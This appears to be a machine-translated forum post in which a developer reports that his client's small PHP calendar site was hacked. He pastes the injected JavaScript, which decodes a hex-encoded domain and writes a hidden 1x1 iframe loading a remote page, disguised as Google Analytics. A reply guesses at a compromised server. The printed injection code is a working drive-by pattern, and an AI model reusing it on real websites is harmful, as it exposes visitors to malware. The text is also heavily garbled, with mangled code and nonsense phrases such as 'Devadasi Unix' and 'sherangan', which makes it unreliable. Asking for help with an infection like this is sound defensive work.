Well, I think this day was coming.
My client has compromised and blacklisted the website from Google. When you load the main page, this javascript is automatically added at the bottom of the document:
& lt; Script type = "text / javascript" & gt; Var str = 'google-analytics.com'; Var str2 = '6b756c6b61726e696f6f37312e636f6d'; Str4 = 'php'; Var str3 = 'if'; Str = ''; (Var i = 0; i & lt; str2.length; i = i + 2) {str = str +% '+ Str2.substr (i, 2);} str = unescape (str); Document.write ('& lt;' + str3 + 'RAM width = 1 height = 1 src = "http: //' + str + '/ index.' + Str4 + '? Id = 382" style = "visibility: Hidden; "& lt; / '+ str3 +' rame & gt; '); & Lt; / Script & gt; & Lt; / Head & gt; & Lt; Body & gt; & Lt; Iframe src = "http://kulkarnioo71.com/index.php?id=382" style = "visibility: hidden;" Width = "1" height = "1" & gt; & Lt; / Iframe & gt; I have not dissect it yet, but it is clearly trying to present as an attacker Google Analytics. I can not wrap my head around, that is, if I remove every single HTML from the main page, then the index is an empty document, what does Javascript still gets embedded? How is this possible?
Update
-
The website is a very simple calendar application, which runs on Devadasi Unix $ 10 / month, MySQL , PHP
-
This is not a specific thing for my computer because my client calls me with the problem. With this I am getting on all the computers (4)
I will run a scan on the webserver ...
Identifying the source
Well, I found out where Javascript is coming from, I simply cleared the template.html file but still my php templateing system Obviously, some code got attached to my index.php and main.php under the files. How is this possible?
A little more background:
- This is a calendar application, as outlined above, and used only by my client's small company To log in need, and only 5 or many people have accounts, I can guarantee that none of them will try any kind of sherangan I obviously do not guarantee to catch someone's information. S Ta and though, try shenanigans.
- Sadly, I've made this website about 4 years ago, so I'm not really 100% confident, trying to kids against everything nowadays, but I'm still It also does not understand how an attacker could possibly gain access to this webserver for adding this JavaScript to this php files.
Any fake HTTP modules (in IIS), or whatever the APA can be, any HTTP request Can modify the content, attach it, or even for static files. It may suggest that the server itself has been compromised.
EDIT: If you tell us what type of web server you are using, then we will be able to get more specific suggestions for troubleshooting.
Comments
Post a Comment